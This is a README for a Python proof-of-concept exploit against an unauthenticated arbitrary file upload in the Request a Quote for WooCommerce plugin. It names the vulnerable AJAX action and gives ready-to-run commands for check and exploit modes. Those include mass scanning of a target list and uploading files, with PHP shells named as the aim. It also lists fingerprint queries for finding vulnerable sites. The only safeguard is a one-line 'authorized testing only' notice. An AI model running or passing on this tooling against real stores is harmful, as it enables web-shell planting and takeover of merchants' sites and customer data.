
Python PoC that checks and exploits CVE-2026-18143, an unauthenticated arbitrary file upload in Addify Request a Quote for WooCommerce ≤ 2.9.2 via the popup AJAX handler.
Python 3 PoC for CVE-2026-18143 in Request a Quote for WooCommerce (woocommerce-request-a-quote, Addify / WooCommerce.com).
CVE-2026-18143 — Request a Quote for WooCommerce ≤ 2.9.2 allows unauthenticated arbitrary file upload (CWE-434, CVSS 9.8 Critical) via afrfq_submit_quote_via_popup(). The popup handler calls move_uploaded_file() using the raw client filename without extension or MIME allowlisting, writing into a web-accessible temporary RFQ upload directory. Attackers can upload .php shells when a public quote rule uses the multi-page popup flow. Fixed in > 2.9.2.
PoC page: https://pocbit.org/pocs/cve-2026-18143
Catalog: https://pocbit.org/pocs/
| Product | Request a Quote for WooCommerce (Addify) |
| Plugin path | wp-content/plugins/woocommerce-request-a-quote/ |
| Affected | ≤ 2.9.2 |
| AJAX | action=afrfq_submit_quote_via_popup → admin-ajax.php |
| Prerequisite | Popup quote rule enabled on storefront |
pip install -r requirements.txt
python poc.py -u https://shop.example --mode check
python poc.py -u https://shop.example --mode check --upload-probe
python poc.py -u https://shop.example --mode exploit --nonce YOUR_NONCE --verify
python poc.py -u https://shop.example --mode exploit --page /shop/ --verify
python poc.py --list targets.example.txt --mode check -j 15
Nonce is usually in front-end JS (afrfq localized object) on shop/product pages when the quote popup is active.
body="/wp-content/plugins/woocommerce-request-a-quote/"
body="afrfq"
Authorized testing only. --upload-probe / --mode exploit write files to the target.